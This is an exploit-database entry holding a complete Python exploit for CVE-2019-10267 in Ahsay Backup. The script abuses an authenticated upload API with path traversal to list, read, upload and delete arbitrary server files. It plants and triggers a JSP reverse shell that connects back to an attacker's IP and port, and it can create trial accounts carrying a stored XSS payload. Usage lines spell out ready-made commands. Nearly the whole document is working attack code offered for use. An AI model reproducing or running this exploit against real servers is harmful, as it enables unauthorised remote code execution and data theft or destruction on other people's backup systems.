Ahsay Backup - Insecure File Upload and Code Execution (Authenticated)
Author: Wietse Boonstra
type: webapps
platform: jsp
date_added: 2019-07-26
date_updated: 2021-11-11
verified: 1
codes: CVE-2019-10267
raw file: 47179.py
type: webapps
platform: jsp
date_added: 2019-07-26
date_updated: 2021-11-11
verified: 1
codes: CVE-2019-10267
raw file: 47179.py
# Exploit Title: Ahsay Backup - Insecure File Upload and Code Execution (Authenticated) # Date: 26-6-2019 # Exploit Author: Wietse Boonstra # Vendor Homepage: https://ahsay.com # Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe # Version: 7.x < # Tested on: Windows / Linux # CVE : CVE-2019-10267 # Session cookies are reflected in the JavaScript url: #!/usr/bin/env python3 import urllib3 import argparse import base64 import re import socket from urllib.parse import urlencode import gzip import json import hashlib urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def b64(s): try: return base64.b64encode(bytes(s, 'utf-8')).decode('utf-8') except: return base64.b64encode(bytes("", 'utf-8')).decode('utf-8') def md5Sum(buf): hasher = hashlib.md5() hasher.update(buf) a = hasher.hexdigest() return a class Exploit(): def __init__(self, url, username="", password="", proxy="" ): self.url = url self.username = username self.password = password self.accountValid = None if proxy: self.http = urllib3.ProxyManager(proxy) else: self.http = urllib3.PoolManager() def fileActions(self, path="../../../../../../", action='list', recurse=False): """ actions: download, list, delete, (upload different function use self.upload) """ try: if not self.checkAccount(self.username,self.password): return False if recurse: recurse = "true" else: recurse = "false" headers={ 'X-RSW-Request-1': '{}'.format(b64(self.password)), 'X-RSW-Request-0': '{}'.format(b64(self.username)) } # http = urllib3.ProxyManager("https://localhost:8080") path = { 'X-RSW-custom-encode-path':'{}'.format(path), 'recursive':'{}'.format(recurse) } path = urlencode(path) if action == "delete": r = self.http.request('DELETE', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers) else: r = self.http.request('GET', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers) if (r.status == 200): if (action == 'list'): result = json.loads(gzip.decompress(r.data)) dash = '-' * 50 print(dash) print('{:<11}{:<16}{:<20}'.format("Type", "Size","Name")) print(dash) for item in result["children"]: print('{:<11}{:<16}{:<20}'.format(item['fsoType'], item['size'],item['name'])) print(dash) else: if action == "delete": print ("File has been deleted") else: return (r.data.decode('utf-8')) else: print ("Something went wrong!") print (r.data) print (r.status) except Exception as e: print (e) pass def exploit(self, ip, port, uploadPath="../../webapps/cbs/help/en/", reverseShellFileName="test.jsp" ): """ This function will setup the jsp reverse shell """ if not self.checkAccount(self.username, self.password): return False reverseShell = '''<%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread {{ InputStream az; OutputStream jk; StreamConnector( InputStream az, OutputStream jk ) {{ this.az = az; this.jk = jk; }} public void run() {{ BufferedReader vo = null; BufferedWriter ijb = null; try {{ vo = new BufferedReader( new InputStreamReader( this.az ) ); ijb = new BufferedWriter( new OutputStreamWriter( this.jk ) ); char buffer[] = new char[8192]; int length; while( ( length = vo.read( buffer, 0, buffer.length ) ) > 0 ) {{ ijb.write( buffer, 0, length ); ijb.flush(); }} }} catch( Exception e ){{}} try {{ if( vo != null ) vo.close(); if( ijb != null ) ijb.close(); }} catch( Exception e ){{}} }} }} try {{ String ShellPath; if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {{ ShellPath = new String("/bin/sh"); }} else {{ ShellPath = new String("cmd.exe"); }} Socket socket = new Socket( "{0}", {1} ); Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); }} catch( Exception e ) {{}} %>'''.format(str(ip), str(port)) try: if (uploadPath == "../../webapps/cbs/help/en/"): callUrl = "{}/{}{}".format(self.url,re.sub("^../../webapps/",'',uploadPath),reverseShellFileName) exploitUrl = "{}{}".format(uploadPath,reverseShellFileName) print (exploitUrl) self.upload(exploitUrl, reverseShell) print ("Checking if file is uploaded.") if (md5Sum(self.fileActions(exploitUrl,'download').encode('utf-8')) == md5Sum(reverseShell.encode('utf-8'))): print ("File content is the same, upload OK!") print ("Triggering {}".format(callUrl)) # http = urllib3.ProxyManager("https://localhost:8080") r = self.http.request('GET', '{}'.format(callUrl)) if r.status == 200: print ("Done, Check your netcat listener!") return True else: return False except Exception as e: print (e) return False def upload(self, filePath, fileContent ): """ Needs a valid username and password. Needs a filepath + filename to upload to. Needs the file content. """ b64UploadPath = b64("{}".format(filePath)) try: if not self.checkAccount(self.username, self.password): return False headers={ 'X-RSW-Request-0': '{}'.format(b64(self.username)), 'X-RSW-Request-1': '{}'.format(b64(self.password)), 'X-RSW-custom-encode-path': '{}'.format(b64UploadPath) } # http = urllib3.ProxyManager("https://localhost:8080") r = self.http.request( 'PUT', '{}/obs/obm7/file/upload'.format(self.url), body=fileContent, headers=headers) if (r.status == 201): print ("File {}".format(r.reason)) else: print ("Something went wrong!") print (r.data) print (r.status) except Exception as e: print ("Something went wrong!") print (e) pass def checkAccount(self, username, password): try: headers={ 'X-RSW-custom-encode-password': '{}'.format(b64(password)), 'X-RSW-custom-encode-username': '{}'.format(b64(username)) } # http = urllib3.ProxyManager("https://localhost:8080") r = self.http.request('POST', '{}/obs/obm7/user/getUserProfile'.format(url),'',headers) if (r.data == b'CLIENT_TYPE_INCORRECT') or (r.status == 200): if self.accountValid is None: print ("Account is valid with username: '{}' and password '{}'".format(username, password)) self.accountValid = True return True elif (r.data == b'USER_NOT_EXIST'): if not self.accountValid is None: print ("Username does not exist!") self.accountValid = False return False elif (r.data == b'PASSWORD_INCORRECT'): if self.accountValid is None: print ("Password not correct but username '{}' is".format(username)) self.accountValid = False return False else: if self.accountValid is None: print ("Something went wrong!") self.accountValid = False return False # print (r.data) # print (r.status) except Exception as e: print (e) self.accountValid = False return False def checkTrialAccount(self): try: # http = urllib3.ProxyManager("https://localhost:8080") r = self.http.request('POST', '{}/obs/obm7/user/isTrialEnabled'.format(self.url),'','') if (r.status == 200 and r.data == b'ENABLED' ): print ("Server ({}) has Trial Account enabled, exploit should work!".format(self.url)) return True else: print ("Server ({}) has Trial Account disabled, please use a valid account!".format(self.url)) return False except Exception as e: print ("Something went wrong with url {} !".format(self.url)) print (e) return False def addTrialAccount(self,alias=""): try: if not self.checkTrialAccount(): return False headers={ 'X-RSW-custom-encode-alias': '{}'.format(b64(alias)), 'X-RSW-custom-encode-password': '{}'.format(b64(self.password)), 'X-RSW-custom-encode-username': '{}'.format(b64(self.username)) } # http = urllib3.ProxyManager("https://localhost:8080") r = self.http.request('POST', '{}/obs/obm7/user/addTrialUser'.format(url),'',headers) if (r.status == 200): print ("Account '{}' created with password '{}'".format(username, password)) elif (r.data == b'LOGIN_NAME_IS_USED'): print ("Username is in use!") elif (r.data == b'PWD_COMPLEXITY_FAILURE'): print ("Password not complex enough") else: print ("Something went wrong!") print (r.data) print (r.status) except Exception as e: print (e) pass if __name__ == "__main__": parser = argparse.ArgumentParser( __file__, description="Exploit for AhsayCBS v6.x < v8.1.1..50", usage=""" Check if Trial account is enabled: %(prog)s --host -c Create Trial account: %(prog)s --host -a -u test01 -p 'Welcome01!' Create Trial account with stored XSS: %(prog)s --host -a -u test01 -p 'Welcome01!' -x --xssvalue "'><script>alert(1)</script>" Delete file: %(prog)s --host -u test01 -p Welcome01! --action delete --path ../../../../../../../../test.txt List files in dir: %(prog)s --host -u test01 -p Welcome01! --action list --path ../../../../../../../../ Upload a file: %(prog)s --host -u test01 -p Welcome01! --action upload --localfile test.txt --path ../../../../../../../../ --filename test.txt Upload reverse shell: %(prog)s --host -u test01 -p Welcome01! -e --ip --port 4444 """ ) manda = parser.add_argument_group("Mandatory options") manda.add_argument("--host", help="Url of AhsayCBS server", # required=True ) check = parser.add_argument_group("Check options") check.add_argument("-c", "--check", help="Check if host is vulnerable", action="store_true" ) add = parser.add_argument_group("Add account options") add.add_argument("-a","--add", help="Add trial account", action="store_true" ) add.add_argument("-u","--username", help="username to create" ) add.add_argument("-p","--password", help="Password to create" ) exploit = parser.add_argument_group("Exploit options") exploit.add_argument("-e", "--exploit", help="Run reverse shell exploit", action="store_true" ) exploit.add_argument("--ip", help="Set the attackers IP", default="" ) exploit.add_argument("--port", help="Set the attackers port", default="4444" ) #Optional xss = parser.add_argument_group("XSS") xss.add_argument("-x","--xss", help="Use XSS in alias field.", action="store_true", default=False ) xss.add_argument("--xssvalue", help="Custom XSS value (must start with '>)", default="'><script>alert(1)</script>", required=False ) # list files fileaction = parser.add_argument_group("File actions", "We can control the files on the server with 4 actions: list content of directory, download file (read), write file (upload) and delete file." ) fileaction.add_argument("--action", help="use: delete, upload, download or list", default="list" ) fileaction.add_argument("--localfile", help="Upload a local file" ) fileaction.add_argument("--filename", help="Filename on the server" ) fileaction.add_argument("--path", help="Directory on server use ../../../", default="/" ) fileaction.add_argument("--recursive", help="Recurse actions list and delete", action="store_true", default=False ) try: args = parser.parse_args() if args.add and (args.username is None or args.password is None): parser.error("The option --add / -a requires: --username and --password") if args.exploit and (args.username is None or args.password is None or args.ip is None or args.port is None): parser.error("The option -e / --exploit requires: --username, --password, --ip and --port") # if not (args.host or args.r7): if not (args.host): parser.error("The option --host requires: -a, -c, -e or -f") else: url = args.host url = url.rstrip('/') username = args.username password = args.password e = Exploit(url,username,password) #Include proxy option inside brackets if required -> "http://localhost:8080" if args.check: e.checkTrialAccount() elif args.add: if args.xss and (args.xssvalue is None): parser.error("The option -x / --xss requires: --xssvalue") if args.xssvalue: alias = args.xssvalue e.addTrialAccount(alias) elif args.exploit: print ("Exploiting please start a netcat listener on {}:{}".format(args.ip,args.port)) input("Press Enter to continue...") e.exploit(args.ip, args.port,"../../webapps/cbs/help/en/","SystemSettings_License_Redirector_AHSAY.jsp") elif args.action != "upload": e.fileActions(args.path,args.action,args.recursive) elif args.action == "upload": if args.localfile is not None: f = open(args.localfile, "r") fileContent = f.read() e.upload("{}{}".format(args.path,args.filename),fileContent) else: parser.error("The option --upload must contain path to local file") except Exception as e: print (e) pass
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